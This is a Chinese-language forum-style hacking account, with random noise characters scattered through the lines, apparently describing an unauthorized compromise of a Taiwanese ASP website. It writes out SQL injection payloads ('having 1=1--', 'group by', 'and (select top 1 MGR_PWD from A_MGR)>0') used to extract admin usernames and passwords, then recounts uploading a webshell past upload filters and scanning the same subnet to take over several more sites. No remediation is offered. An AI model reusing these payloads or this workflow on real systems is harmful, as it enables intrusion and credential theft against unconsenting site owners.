发现一个注入点. g* H7 ]( B/ s8 O7 ^# T( Q; K: T
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389# U7 c" ?# o5 c6 w
( R5 N! {' V; t( X. h7 ~2 }习惯性的加’having1=1--
# O+ M, ~5 S9 o0 [" _1 |% f+ p
1 j4 n5 O/ b5 D+ ihttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
* u) T7 K4 Y' E- e$ u% y. r5 a
- `+ n2 _7 P- @2 V% A2 f0
- [+ g5 W* O- c4 B2 J! m' _) R6 f1 a( ~1 r
爆出Diary_A.dl_Title(这时候很激动啊): Q# e* v8 k. e! s* p
" X& \* |6 Z W5 b. v) _5 @那么继续- g s* P2 O: O( J* _; }3 r
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—( d4 ` p7 K* \7 @2 f" u& A
- O. N! ]( v/ A继续,一直爆下去
" u, y( r8 A+ \6 F ^% U1 f: o9 \ z1 F
爆到几个字段和表段 但是没找到需要的管理用户的字段
/ T4 P6 a9 l( v& E0 B& V) ~
8 w- T1 H' ]" {: v) K! ]蛋疼了 怎么办 然后去后台登陆页看源码
0 L9 H) p% {9 L! _7 b
* n9 P. W% U0 y0
+ H9 I( u/ t2 P) |, B
B& c+ I9 h/ }# k5 XInput name= “ADUID”! V) D( B1 V7 q
Input name= “ADPWD”; h9 @% L5 u6 l. a* Q$ w! U& u
. q5 y0 m% K; ?5 n0 | O% }很幸运 找到了字段那就继续) @& m+ l; J; t# ]3 A1 X, \
找到之后开始爆用户( _5 G( G' O, ^7 {- T
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
5 H6 n* O- J+ e6 y爆密码; r$ l9 [4 a9 I. d
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—6 D' p) W% {, [$ z/ `- w& P, j1 q
测试了下 这个注入点只能爆到文章哪里的表 " R7 [; H8 C4 G9 W# O# S0 ]* t4 a) u
+ L$ h' i+ F5 K$ T4 R
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
8 C) H6 k" C$ W1 T( j- R4 w. W t0 m7 C/ N: g0 ?
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了! K1 t5 j( k. m2 n- ~
7 e2 n. f2 F( q" D: R* R
473
- W2 k& M6 l3 X# q& b' ~; S/ }# O1 n; F
进后台& [( d) w- y- `. P
* h Z, y* L* y5 s
/ b$ u4 |9 h5 O- g发现几个上传点 有的地方不能上传 而且防止恶意代码# Z2 i, T! Z) J* ?% E
0 H# `! S% S0 \. Y) H
没办法 各种百度各种找大牛 找到一只好像可以突破的马
7 L V, F% p E, ]' X$ B
" B' c. T1 p% x1 w, z0 Y/ c
6 ^- i( \: f/ U; w# n在系统管理那里直接上传 不过没有显示地址
4 H9 A5 A2 g, }0 `; T- \ n$ u7 V$ S) e+ X" T6 [
再上传一次 抓包 搞定OK2 q* d0 G/ r" g; c/ l* X
$ X0 \0 _0 F" O- ^; f+ X$ f C8 h) z7 M9 ]. y7 D
" t+ I1 l1 A- r6 k* u
472
3 f5 a. R9 F+ @0 u
( |: O. S; v% C晚上不行了 去睡觉。。。# |. o' e0 z8 X- ~
第二天刚起床 闲的没事做继续日站吧
8 I/ q- m7 u8 r$ c& a8 q; Y- s# |6 t9 H( Z' h& {8 h; W
找个站 就把这个站的旁c扫了下
' r4 u0 ]8 g/ G# V' s5 f8 c. s1 R
6 J1 {& }! j9 V/ A \5 o, ~发现c段也有一个购物站 ,然后还和这个站的模板差不多$ W$ ]9 n8 s2 P- l( v# ]( W
5 ^5 L3 Q/ A, W1 d9 @+ s. g就找到会员登录口测试+ Q2 ]7 z% d& E7 `' s
' V* C8 `; O; ]3 n6 Q( M" w) O/ j% _
'and (select top 1 MGR_UID from A_MGR)>0—
: I" |$ {( z; `果断爆到了 这时候我很激动 通杀
, r. a, L& I' A6 N I! E v. E9 a* m6 @# W2 E0 `1 X+ b
再次翻c段1 B1 Z: x- G% m5 n, L
5 _4 Y" F8 m2 E
翻出几个站 都成功拿下, h! @: v2 W8 J& K& ?; [
; k% L& N& m3 ?' {" A/ U
& I9 L5 O, P* F7 c2 m; c; R
* O- w) m7 m) j/ g3 X
修复方案: s* g) S! H8 T1 |$ ^
他们比我专业 0 n* V/ y- t, @+ p' Z
" K e# ?( E, z" Q8 B9 v4 Y7 C8 F
; U* d+ w' F- n, t: N0 D
; |0 E m6 O0 K2 d) a |